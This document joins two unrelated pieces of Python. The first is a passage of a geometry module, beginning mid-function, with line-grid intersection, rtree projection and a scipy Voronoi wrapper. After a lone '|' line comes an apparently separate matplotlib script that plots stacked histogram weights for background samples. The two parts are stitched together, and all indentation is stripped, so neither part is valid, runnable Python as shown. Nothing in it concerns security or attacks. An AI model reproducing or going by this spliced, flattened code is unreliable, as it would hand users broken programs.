if dy > 0:
c, d = c / dy, d / dy
else:
c, d = d / dy, c / dy
return max(0, c), min(1, d)
elif _np.abs(dy) < 1e-10:
# (Proper) Horizontal line
if not ( ymin <= start[1] and start[1] < ymax ):
return None
a, b = xmin - start[0], xmax - start[0]
if dx > 0:
a, b = a / dx, b / dx
else:
a, b = b / dx, a / dx
return max(0, a), min(1, b)
else:
# Line in general position
a, b = xmin - start[0], xmax - start[0]
if dx > 0:
a, b = a / dx, b / dx
else:
a, b = b / dx, a / dx
c, d = ymin - start[1], ymax - start[1]
if dy > 0:
c, d = c / dy, d / dy
else:
c, d = d / dy, c / dy
tmin = max(a, c, 0)
tmax = min(b, d, 1)
if tmin < tmax:
return (tmin, tmax)
return None
def line_meets_geometry(geo, line):
"""Does the line intersect the geometry?
:param geo: `shapely` object
:param line: A line in the usual format, an iterable of points `(x,y)`
:return: True or False
"""
line = _geometry.LineString(list(line))
return geo.intersects(line)
def lines_which_meet_geometry(geo, lines):
"""Which of the lines intersect the geometry?
:param geo: `shapely` object
:param lines: An iterable of lines in the usual format: each an iterable of
points `(x,y)`
:return: List of True or False
"""
return [line_meets_geometry(geo, line) for line in lines]
def intersect_line_grid_most(line, grid):
"""Intersect a line with a grid. Finds the grid cell which contains the
largest fraction of the line (which might be an _arbitrary_ choice between
more than one grid cell).
:param line: `((x1,y1), (x2,y2))`
:param grid: Instance of :class:`data.Grid` or same interface.
:return: The grid cell `(gx, gy)` which contains most of the line.
"""
_, intervals = full_intersect_line_grid(line, grid)
best, length = None, None
for (gx, gy, t1, t2) in intervals:
t = t2 - t1
if length is None or t > length:
best, length = (gx, gy), t
return best
def intersect_line_grid(line, grid):
"""Intersect a line with a grid, returning the smallest set of new lines
which cover the original line and such that each new line segment lies
entirely within one grid cell.
:param line: `((x1,y1), (x2,y2))`
:param grid: Instance of :class:`data.Grid` or same interface.
:return: List of line segments.
"""
segments, _ = full_intersect_line_grid(line, grid)
return segments
def full_intersect_line_grid(line, grid):
"""Intersect a line with a grid, returning the smallest set of new lines
which cover the original line and such that each new line segment lies
entirely within one grid cell.
:param line: `((x1,y1), (x2,y2))`
:param grid: Instance of :class:`data.Grid` or same interface.
:return: `(segments, intervals)` where `segments` is as
:meth:`intersect_line_grid_most` and `intervals` is a list of tuples
`(gx, gy, t1, t2)` telling that the line segment from (line coordinates)
`t1` to `t2` is in grid cell `gx, gy`. The ordering is the same as
`segments`.
"""
gx, gy = grid.grid_coord(*line[0])
if grid.grid_coord(*line[1]) == (gx, gy):
return [line], [(gx, gy, 0, 1)]
segments, intervals = [], []
start = (line[0][0] - grid.xoffset, line[0][1] - grid.yoffset)
end = (line[1][0] - grid.xoffset, line[1][1] - grid.yoffset)
search = start
delta = 1e-8
while True:
gx, gy = _math.floor(search[0] / grid.xsize), _math.floor(search[1] / grid.ysize)
bbox = (gx * grid.xsize, gy * grid.ysize, (gx+1) * grid.xsize, (gy+1) * grid.ysize)
intersects = intersect_line_box(start, end, bbox)
if intersects is None:
t2 = 0
else:
t1, t2 = intersects
segments.append((
(start[0]*(1-t1) + end[0]*t1 + grid.xoffset, start[1]*(1-t1) + end[1]*t1 + grid.yoffset),
(start[0]*(1-t2) + end[0]*t2 + grid.xoffset, start[1]*(1-t2) + end[1]*t2 + grid.yoffset)
))
intervals.append((gx, gy, t1, t2))
t2 += delta
if t2 >= 1:
break
search = (start[0]*(1-t2) + end[0]*t2, start[1]*(1-t2) + end[1]*t2)
return segments, intervals
try:
import rtree as _rtree
except:
_logger.error("Failed to import `rtree`.")
_rtree = None
class ProjectPointLinesRTree():
"""Accelerated projection code using `rtree`.
:param lines: A list of linear segments (see
:func:`project_point_to_line`).
"""
def __init__(self, lines):
self._lines = list(lines)
def gen():
for i, line in enumerate(self._lines):
bds = self._bounds(line)
yield i, bds, None
self._idx = _rtree.index.Index(gen())
@staticmethod
def _bounds(line):
it = iter(line)
x, y = next(it)
xmin, xmax = x, x
ymin, ymax = y, y
for (x, y) in it:
xmin = min(xmin, x)
xmax = max(xmax, x)
ymin = min(ymin, y)
ymax = max(ymax, y)
return [xmin, ymin, xmax, ymax]
def project_point(self, point):
"""As :func:`project_point_to_lines` but uses `rtree` at a first pass.
:param point: Pair `(x,y)`
"""
point = _np.asarray(point)
h = 1
while True:
xmin, xmax = point[0] - h, point[0] + h
ymin, ymax = point[1] - h, point[1] + h
indices = list(self._idx.intersection((xmin,ymin,xmax,ymax)))
if len(indices) > 0:
choices = [self._lines[i] for i in indices]
best = project_point_to_lines(point, choices)
distsq = _np.sum((best - point)**2)
if distsq <= h*h:
return best
h += h
#############################################################################
# Voroni cell stuff
#############################################################################
try:
import scipy.spatial as _spatial
except Exception as ex:
_logger.error("Failed to import `scipy.spatial` because {}".format(ex))
_spatial = None
class Voroni():
"""A wrapper around the `scipy.spatial` voroni diagram finding routine.
:param points: Array of shape `(N,n)` of `N` points in `n`-dimensional
space.
"""
def __init__(self, points):
points = _np.asarray(points)
if len(points.shape) != 2 or points.shape[1] != 2:
raise ValueError("Need array of shape (N,2)")
self._v = _spatial.Voronoi(points)
self._infinity_directions = dict()
centre = _np.mean(self._v.points, axis=0)
for ((a,b),(aa,bb)) in zip(self._v.ridge_vertices, self._v.ridge_points):
if a == -1:
x, y = self.perp_direction(self._v.points, aa, bb, centre)
self._infinity_directions[b] = x, y
@property
def voroni(self):
"""The `scipy.spatial.Voroni` class"""
return self._v
def polygons(self, inf_dist=1):
"""Return a list of polygons, one for each "region" of the voroni
diagram.
:param inf_dist: The distance to make each line towards the "point at
infinity".
:return: Iterator of "polygons". Each "polygon" is a list of `(x,y)`
points specifying the vertices.
"""
done = set()
for point_index in range(self._v.points.shape[0]):
region_index = self._v.point_region[point_index]
if region_index in done:
continue
done.add(region_index)
yield self._region_as_polygon(region_index, point_index, inf_dist)
def polygon_for(self, point_index, inf_dist=1):
"""Return the polygon from the diagram which contains the given point.
:param point_index: Index into `self.points`
:param inf_dist: The distance to make each line towards the "point at
infinity".
:return: A "polygon", which is a list of `(x,y)` points specifying the
vertices.
"""
region_index = self._v.point_region[point_index]
return self._region_as_polygon(region_index, point_index, inf_dist)
def polygon_for_by_distance(self, point_index, distance):
"""Return the polygon from the diagram which contains the given point.
Scale the size so that the containing point is `distance` away from
"infinity".
"""
region_index = self._v.point_region[point_index]
poly, extra = self._region_datum(region_index, point_index)
if extra is not None:
inf_index, (first, second) = extra
x1 = _np.asarray([first[0], first[1]])
dx1 = _np.asarray([first[2], first[3]])
x2 = _np.asarray([second[0], second[1]])
dx2 = _np.asarray([second[2], second[3]])
pt = self.points[point_index]
def dist(t):
return self._distance_line_to_point(x1 + t * dx1, x2 + t * dx2, pt)
res = _optimize.minimize(dist, [0], bounds=[[0,_np.inf]])
tzero = res.x
if dist(tzero) > distance:
t0 = 1
else:
t_up = tzero * 2
while dist(t_up) < 1.1 * distance:
t_up += t_up + 1
t0 = _optimize.brentq(lambda x : dist(x) - distance, tzero, t_up)
poly[inf_index] = x1 + t0 * dx1
poly.insert(inf_index, x2 + t0 * dx2)
return poly
def _region_datum(self, region_index, point_index):
region = self._v.regions[region_index]
containing_points = {point_index}
poly = [self._v.vertices[k] for k in region]
if -1 in region:
inf_index = region.index(-1)
after_vertex = region[(inf_index + 1) % len(region)]
choices = self._find_perp_line_to_infinity(after_vertex, containing_points)
a, b = choices[0]
dx, dy = self.perp_direction(self._v.points, a, b)
x, y = self._v.vertices[after_vertex]
extras = [(x, y, dx, dy)]
before_vertex = region[(inf_index - 1) % len(region)]
if before_vertex == after_vertex:
a, b = choices[1]
else:
a, b = self._find_perp_line_to_infinity(before_vertex, containing_points)[0]
dx, dy = self.perp_direction(self._v.points, a, b)
x, y = self._v.vertices[before_vertex]
extras.append((x, y, dx, dy))
return poly, (inf_index, extras)
else:
return poly, None
def _region_as_polygon(self, region_index, point_index, inf_dist):
poly, extra = self._region_datum(region_index, point_index)
if extra is not None:
inf_index, (first, second) = extra
x, y, dx, dy = first
poly[inf_index] = x + dx * inf_dist, y + dy * inf_dist
x, y, dx, dy = second
poly.insert(inf_index, (x + dx * inf_dist, y + dy * inf_dist))
return poly
@staticmethod
def _distance_line_to_point(line_start, line_end, point):
a = _np.asarray(line_start)
b = _np.asarray(line_end)
v = b - a
vnormsq = _np.sum(v * v)
x = _np.asarray(point) - a
if vnormsq < 1e-12:
return _np.sqrt(_np.sum(x * x))
t = _np.sum(x * v) / vnormsq
u = x - t * v
return _np.sqrt(_np.sum(u * u))
def _find_perp_line_to_infinity(self, vertex, containing_points):
out = []
for verts, between in zip(self._v.ridge_vertices, self._v.ridge_points):
if set(verts) == {-1, vertex}:
if len(set(between).intersection(containing_points)) > 0:
out.append(between)
return out
@property
def points(self):
"""The input points"""
return self._v.points
@property
def vertices(self):
"""The voroni diagram vertices. An array of shape `(M,2)`.
"""
return self._v.vertices
@property
def regions(self):
"""A list of the regions of the diagram. Each region is a list of
indicies into `vertices`, where `-1` means the point at infinity."""
return self._v.regions
@property
def point_region(self):
"""A list, ordered as `points`, giving which "region" each input
point is in."""
return self._v.point_region
@property
def ridge_vertices(self):
"""The "ridges" of the diagram are the lines forming the boundaries
between regions. This gives a list of pairs of indicies into
`vertices`, where `-1` means the point at infinity."""
return self._v.ridge_vertices
@property
def ridge_points(self):
"""Each "ridge" is perpendicular to a line between two points in the
input data. For each entry of `ridge_vertices` the perpendicular line
is given by the indicies of the corresponding entry in this list
"""
return self._v.ridge_points
@staticmethod
def perp_direction(points, a, b, centre=None):
"""Find a vector perpendicular to the line specified, oriented away
from `centre`.
:param points: Array of shape `(N,n)` of `N` points in `n`-dimensional
space.
:param a: Index into `points` of start of line.
:param b: Index into `points` of end of line.
:param centre: The location to orient from; if `None` then compute
as centroid of the `points`.
:return: Tuple of size `n` giving a vector orthogonal to the line,
and oriented away from `centre`.
"""
diff = points[b] - points[a]
norm = _np.sqrt(_np.sum(diff*diff))
diff = _np.asarray([diff[1]/norm, -diff[0]/norm])
if centre is None:
centre = _np.mean(points, axis=0)
else:
centre = _np.asarray(centre)
midpoint = (points[a] + points[b]) / 2
if _np.dot(centre - midpoint, diff) <= 0:
return diff
else:
return -diff
|
def selection_6():
# Library import
import numpy
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
# Library version
matplotlib_version = matplotlib.__version__
numpy_version = numpy.__version__
# Histo binning
xBinning = numpy.linspace(0.0,15.0,76,endpoint=True)
# Creating data sequence: middle of each bin
xData = numpy.array([0.1,0.3,0.5,0.7,0.9,1.1,1.3,1.5,1.7,1.9,2.1,2.3,2.5,2.7,2.9,3.1,3.3,3.5,3.7,3.9,4.1,4.3,4.5,4.7,4.9,5.1,5.3,5.5,5.7,5.9,6.1,6.3,6.5,6.7,6.9,7.1,7.3,7.5,7.7,7.9,8.1,8.3,8.5,8.7,8.9,9.1,9.3,9.5,9.7,9.9,10.1,10.3,10.5,10.7,10.9,11.1,11.3,11.5,11.7,11.9,12.1,12.3,12.5,12.7,12.9,13.1,13.3,13.5,13.7,13.9,14.1,14.3,14.5,14.7,14.9])
# Creating weights for histo: y7_DELTAR_0
y7_DELTAR_0_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,25.8787050387,48.4821569834,62.6681443967,71.4868165721,75.0772933864,77.3044914103,68.5676991622,56.5270298455,46.3450388796,39.3932730477,33.0883866418,27.9093712369,23.3362792945,19.9586582914,16.8758130267,14.5258111117,11.9956653566,9.99775112933,8.55663640798,6.53415820246,5.56385906337,4.20871626575,3.34486663221,2.70209520252,2.01019501642,1.50662266322,1.11359061195,0.859757637166,0.573171891444,0.311150363927,0.200610102005,0.0818816873491,0.00818816873491,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_1
y7_DELTAR_1_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0243067199767,0.0,0.0,0.0242945760233,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_2
y7_DELTAR_2_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0301235473445,0.0301201301501,0.0602001795444,0.07029003463,0.170647867166,0.0702986705867,0.110519502419,0.070259953403,0.080279563865,0.0903759888888,0.110412193426,0.0903980539647,0.0100457331979,0.0602205091649,0.0702763989089,0.0100369732801,0.0100340932506,0.0201103993878,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_3
y7_DELTAR_3_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.115514678532,0.137468441067,0.32449557438,0.401432017002,0.505913588194,0.588625228483,0.544406103719,0.506126060997,0.594246616965,0.407111297214,0.390549671913,0.313482576798,0.285907750787,0.253083830895,0.275016427402,0.120956216709,0.104539828553,0.0605001072115,0.0660036809464,0.0384954040172,0.00551421768798,0.00550877789671,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_4
y7_DELTAR_4_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0868390655213,0.199335150448,0.307919946725,0.387786392682,0.495404910669,0.496345255327,0.522048810971,0.443091124353,0.411545086299,0.287165425818,0.235871989614,0.155924856794,0.146079536407,0.101652219522,0.0651206312155,0.0384886074746,0.0286232536578,0.0138174027603,0.00986914966675,0.00197291163428,0.00197407403816,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_5
y7_DELTAR_5_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0363016452016,0.0746097333537,0.127303637754,0.163844650115,0.207199014107,0.222824918288,0.227387318367,0.179241530038,0.131321845148,0.0965403664611,0.0620102382963,0.0491625936153,0.0274789978195,0.0166353474019,0.0103369482515,0.00352911856957,0.00201570634945,0.000756662697875,0.000756519057574,0.0,0.000504354307369,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_6
y7_DELTAR_6_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0114511954272,0.0331991204441,0.047528882664,0.0718684875137,0.085902275404,0.106799386691,0.0916263185676,0.0658524988544,0.0434946203898,0.0294804568192,0.0163342720103,0.0108731127544,0.00515766010433,0.000859006658699,0.000858866099384,0.00142981713639,0.000285168757298,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_7
y7_DELTAR_7_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00129592372255,0.00295905220822,0.00386564921218,0.00611157314405,0.00848027570987,0.0116604938285,0.00958793251804,0.00509809128351,0.0026786190709,0.00151253490312,0.000970509904428,0.000302351663836,0.000172841392388,0.000129582942606,6.47735549708e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_8
y7_DELTAR_8_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000169965676692,0.000311772196928,0.000595852074499,0.000763864132964,0.000934732747442,0.00133389450317,0.000623547215073,0.000511421229446,0.000311011359367,0.000113616167064,2.84292656694e-05,8.50337984264e-05,0.0,2.84489102457e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_9
y7_DELTAR_9_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_10
y7_DELTAR_10_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,1.0529581672,0.0,0.0,0.0,1.0521138287,0.0,1.05462838872,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_11
y7_DELTAR_11_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.460540223078,0.461016717805,1.38163834565,2.76536711978,1.38236653719,4.14433209946,2.53295143703,0.690788239096,1.61159739067,1.3832088569,0.690965387539,0.690784012127,0.230465320669,0.0,0.461458243967,0.0,0.230360184413,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_12
y7_DELTAR_12_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.525788722102,0.830934494971,1.35684977532,1.52284879879,1.85491724136,1.60630299698,1.24655522799,1.10780200164,0.858689987152,0.553686928898,0.304478553194,0.138431945359,0.193781750681,0.0830468652927,0.0552968355042,0.02771791323,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_13
y7_DELTAR_13_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.20152539658,0.231967957427,0.393278166664,0.453863425926,0.413352988485,0.645125407205,0.413398322878,0.312568806426,0.201600529082,0.141095318098,0.0302722746709,0.0604623708924,0.0504291960467,0.0301716832966,0.0201542085948,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_14
y7_DELTAR_14_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0594504139488,0.0933353246716,0.155640889157,0.138622908449,0.282903331025,0.26593794489,0.209369382748,0.104673014378,0.0905212648482,0.0197882643018,0.0169763090309,0.0113135162088,0.0113285173973,0.00282347952324,0.00565245858451,0.0,0.0,0.00283198083794,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_15
y7_DELTAR_15_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0136881402288,0.0197592221531,0.0167628609754,0.00759898478221,0.0167790056467,0.0137200513654,0.00916855176561,0.00458510202668,0.00152260679112,0.00151881882101,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y7_DELTAR_16
y7_DELTAR_16_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000541741113055,0.00108418443755,0.00162474942344,0.00108258713751,0.00162513248286,0.00180581294981,0.00126438482902,0.000180755038415,0.00036094919314,0.0,0.000180003625974,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating a new Canvas
fig = plt.figure(figsize=(12,6),dpi=80)
frame = gridspec.GridSpec(1,1,right=0.7)
pad = fig.add_subplot(frame[0])
# Creating a new Stack
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights+y7_DELTAR_14_weights+y7_DELTAR_15_weights+y7_DELTAR_16_weights,\
label="$bg\_dip\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#e5e5e5", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights+y7_DELTAR_14_weights+y7_DELTAR_15_weights,\
label="$bg\_dip\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#f2f2f2", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights+y7_DELTAR_14_weights,\
label="$bg\_dip\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights,\
label="$bg\_dip\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights,\
label="$bg\_dip\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#c1bfa8", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights,\
label="$bg\_dip\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#bab5a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights,\
label="$bg\_dip\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b2a596", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights,\
label="$bg\_dip\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b7a39b", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
